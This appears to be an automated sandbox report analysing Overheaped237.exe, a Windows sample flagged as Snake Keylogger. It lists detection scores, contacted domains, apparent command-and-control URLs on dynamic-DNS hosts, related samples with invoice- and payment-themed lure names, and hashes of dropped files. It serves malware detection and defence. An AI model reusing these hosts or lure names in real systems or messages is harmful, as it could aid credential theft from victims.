Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Overheaped237.exe	15%	Virustotal		Browse
Overheaped237.exe	24%	ReversingLabs	Win32.Spyware.Snakekeylogger
Overheaped237.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nst1CBF.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nst1CBF.tmp\nsExec.dll	0%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
drive.google.com	216.58.208.238	true	false	high
drive.usercontent.google.com	172.217.17.65	true	false	high
reallyfreegeoip.org	104.21.67.152	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false		high
http://checkip.dyndns.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2070947673.00000000055C6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000002.00000002.2060287042.00000000046B6000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.2060287042.00000000046B6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://translate.google.com/translate_a/element.js	msiexec.exe, 00000007.00000003.2269618999.00000000093C9000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.2060287042.00000000046B6000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.2060287042.00000000046B6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/3	msiexec.exe, 00000007.00000002.2667128224.000000000930A000.00000004.00000020.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000002.00000002.2070947673.00000000055C6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.2070947673.00000000055C6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/	msiexec.exe, 00000007.00000003.2326052745.0000000009385000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2667128224.0000000009376000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	msiexec.exe, 00000007.00000002.2681540329.0000000024F73000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F65000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024EB8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024FA3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024EF6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024EA9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F4A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F81000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	Overheaped237.exe	false	high
http://varders.kozow.com:8081	msiexec.exe, 00000007.00000002.2681540329.0000000024E01000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.2060287042.00000000046B6000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	msiexec.exe, 00000007.00000002.2681540329.0000000024E01000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com	msiexec.exe, 00000007.00000003.2269618999.00000000093C9000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_Error	Overheaped237.exe	false	high
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.2060287042.0000000004561000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/	msiexec.exe, 00000007.00000002.2667128224.000000000930A000.00000004.00000020.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	msiexec.exe, 00000007.00000002.2681540329.0000000024E01000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/EV	msiexec.exe, 00000007.00000002.2682980095.0000000027151000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.2060287042.00000000046B6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000002.00000002.2070947673.00000000055C6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2070947673.00000000055C6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	msiexec.exe, 00000007.00000002.2681540329.0000000024F73000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F65000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024EF6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F4A000.00000004.00000800.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.org	msiexec.exe, 00000007.00000002.2681540329.0000000024F73000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F65000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F4A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024ED0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	msiexec.exe, 00000007.00000002.2681540329.0000000024F73000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F65000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024EB8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024EF6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F4A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://apis.google.com	msiexec.exe, 00000007.00000003.2269618999.00000000093C9000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	msiexec.exe, 00000007.00000002.2681540329.0000000024F73000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F65000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024EB8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024FA3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024F4A000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2060287042.0000000004561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2681540329.0000000024E01000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	msiexec.exe, 00000007.00000002.2681540329.0000000024EB8000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
172.217.17.65	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
216.58.208.238	drive.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578145
Start date and time:	2024-12-19 10:27:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Overheaped237.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@17/14@4/4
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 94% Number of executed functions: 130 Number of non-executed functions: 41
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 1912 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6256 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:28:30	API Interceptor	42x Sleep call for process: powershell.exe modified
04:30:18	API Interceptor	135x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.67.152	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	0001.exe	Get hash	malicious	Snake Keylogger	Browse
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	87h216Snb7.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
158.101.44.242	HUSDGHCE23ED.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	HUSDGHCE23ED.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	132.226.247.73
	0001.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
reallyfreegeoip.org	HUSDGHCE23ED.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	0001.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.177.134
	Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	PK241200518-EMAIL RELEASE-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	ugpJX5h56S.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	HUSDGHCE23ED.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	172.67.179.109
	CROC000400 .pdf	Get hash	malicious	Unknown	Browse	162.247.243.29
	contract_signed.pdf	Get hash	malicious	Unknown	Browse	104.21.16.1
	https://ipfs.io/ipfs/bafybeih7f27bkklyai5zhnf5s57wuee5khsdrrblepmiz5bozrxxoam2lq/index12.html#pdeneve@vanas.eu	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	iviewers.dll	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	script.ps1	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	MFQbv2Yuzv.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.64.80
	SWIFT COPY.exe	Get hash	malicious	FormBook	Browse	104.21.86.111
	Y41xQGmT37.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.64.80
ORACLE-BMC-31898US	HUSDGHCE23ED.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	150.136.65.7
	sparc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	193.123.7.187
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	la.bot.arm7.elf	Get hash	malicious	Mirai	Browse	129.148.164.81
	la.bot.sh4.elf	Get hash	malicious	Mirai	Browse	132.145.4.150
	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	192.29.189.21

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	HUSDGHCE23ED.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	0001.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	PK241200518-EMAIL RELEASE-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
37f463bf4616ecd445d4a1937da06e19	Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnk	Get hash	malicious	RHADAMANTHYS	Browse	172.217.17.65 216.58.208.238
	main.exe	Get hash	malicious	RHADAMANTHYS	Browse	172.217.17.65 216.58.208.238
	deb.exe	Get hash	malicious	RHADAMANTHYS	Browse	172.217.17.65 216.58.208.238
	iviewers.dll	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.217.17.65 216.58.208.238
	script.ps1	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.217.17.65 216.58.208.238
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.217.17.65 216.58.208.238
	pM3fQBuTLy.exe	Get hash	malicious	Vidar	Browse	172.217.17.65 216.58.208.238
	script.hta	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.217.17.65 216.58.208.238
	Brooming.vbs	Get hash	malicious	Remcos, GuLoader	Browse	172.217.17.65 216.58.208.238
	TT copy.js	Get hash	malicious	FormBook	Browse	172.217.17.65 216.58.208.238

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nst1CBF.tmp\nsExec.dll	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	anziOUzZJs.exe	Get hash	malicious	Remcos	Browse
	SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exe	Get hash	malicious	Unknown	Browse
	PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse
	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse
	cuenta iban-ES65.exe	Get hash	malicious	GuLoader	Browse
	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse
	cuenta iban-ES65.exe	Get hash	malicious	GuLoader	Browse
	rResegregation.exe	Get hash	malicious	FormBook, GuLoader	Browse
	rResegregation.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\justifikationssager.lnk

Download File

Process:	C:\Users\user\Desktop\Overheaped237.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	800
Entropy (8bit):	3.3369259547433714
Encrypted:	false
SSDEEP:	12:8wl0S0sXMlykX6RXUkl1kl13kXg1MJGc3IrRSsTal/jNJkKAp4t2YZ/elFlSJm:8qr/R1Ef3oFIrRZT2hHAzqy
MD5:	08A26A73EB69373F25EF47D823DCC8F1
SHA1:	DABF7E6B928856EEFF54977053C02D88F546AF90
SHA-256:	1529FAA8B445299F6CF97E08BB77A20AAE695FFBD63A74994443ED67A1F2253B
SHA-512:	2DB40A68E7B6A9A8F2EF2C50308CC0A3171CE284E496A9AF677B3AA4B251B8FD0C832703B671D4D52ABBC399FC7C973FFF0938059DD447EC35BE92ED98029C05
Malicious:	false
Reputation:	low
Preview:	L..................F........................................................C....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....\.1...........user.D............................................f.r.o.n.t.d.e.s.k.....h.2...........Filial195.plo.L............................................F.i.l.i.a.l.1.9.5...p.l.o.............\.....\.....\.....\.....\.F.i.l.i.a.l.1.9.5...p.l.o.E.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.c.h.i.n.a.\.M.i.x.e.r.e.n.\.v.e.r.b.a.l.i.s.e.s.\.D.e.i.n.o.s.2.5.3.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5zk3ndpk.wko.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_chngmwww.uap.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huhrbshz.avo.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jbbiia4v.n2a.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsc1A3D.tmp

Download File

Process:	C:\Users\user\Desktop\Overheaped237.exe
File Type:	data
Category:	dropped
Size (bytes):	3792491
Entropy (8bit):	1.446278806490075
Encrypted:	false
SSDEEP:	12288:uongzzfdmYMKE+bjIR2tKz5UqgLbXFiSeT:lg3g3+7u5Uqub1iSy
MD5:	16B0F67E665EBD2D5C596CD0BD2A28A0
SHA1:	4C40FA2FD613AFF718895C94E8F38DDEEC1DADD8
SHA-256:	7EA710840D0DC5DA8E1EF8DB791AC9EE6B70029B4318892B0CAA0841A23D8287
SHA-512:	0652DEBBACFC2449729689FB10213F1A0279BC0B7ED37B1C64E0B199B8FFB21ECCBD8E96E6893334B8D55FAAB2243A025945BD1F0A9537D946560A0B51D700F8
Malicious:	false
Preview:	G#......,...............................i"....../#...............................................k\.........................................................................................................................................................................................J...\...........i...j...............................................................................................................................g...............7...k...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nst1CBF.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\Overheaped237.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	6656
Entropy (8bit):	4.994861218233575
Encrypted:	false
SSDEEP:	96:U7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNN3e:mXhHR0aTQN4gRHdMqJVgNE
MD5:	B648C78981C02C434D6A04D4422A6198
SHA1:	74D99EED1EAE76C7F43454C01CDB7030E5772FC2
SHA-256:	3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
SHA-512:	219C88C0EF9FD6E3BE34C56D8458443E695BADD27861D74C486143306A94B8318E6593BF4DA81421E88E4539B238557DD4FE1F5BEDF3ECEC59727917099E90D2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
